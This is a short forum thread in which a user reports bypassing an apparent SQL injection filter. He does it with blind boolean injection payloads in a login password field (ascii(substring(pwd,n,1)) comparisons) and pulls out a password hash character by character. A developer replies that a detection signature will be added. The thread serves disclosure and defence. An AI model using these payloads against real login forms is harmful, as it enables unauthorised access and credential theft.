HomeForumsBugs

YYEEEESSSS! I'l do it! (2houres)

2 replies
Sat, 08/02/2008 - 11:09
eLWAux
eLWAux's picture
Joined: 08/02/2008
User offline. Last seen 1 year 49 weeks ago.

name: admin
password: blabla') OR ascii(substring(pwd,1,1))>('50 - (+)
password: blabla') OR ascii(substring(pwd,1,1))<('52 - (+)
password: blabla') OR ascii(substring(pwd,1,1))=('52 -(-)
password: password: blabla') OR ascii(substring(pwd,1,1))=('51 - 2 (+)
пfirst symbol: 2
blabla') OR ascii(substring(pwd,2,1)).. secont symbol ....
etc..
in the end:37fa265330ad83eaa879efb1e2db6380896cf639
SHA('pwd')=37fa265330ad83eaa879efb1e2db6380896cf639 its TRUE!!!

YEEEEESSSS!
icq: 354 - 345 - 367

Top
Mon, 08/04/2008 - 19:05
#1
yuli
yuli's picture
Joined: 01/30/2008
User offline. Last seen 2 days 2 hours ago.

Hi eLWAux

Thank you for your email!!!

I will add custom signature for substring() function as a one that can be used to brute force database contents. The fix will be available in the next application release.

Thanks again,
Yuli

Top
Thu, 08/21/2008 - 22:33
#2
enatefox
enatefox's picture
Joined: 08/21/2008
User offline. Last seen 1 year 48 weeks ago.

I registered just to ask: ascii(substring(pwd,1,1))=('51 - 2 (+)

I can't find anything on what's after the '=', what's the function and what is the plus sign doing?

Top

Back to top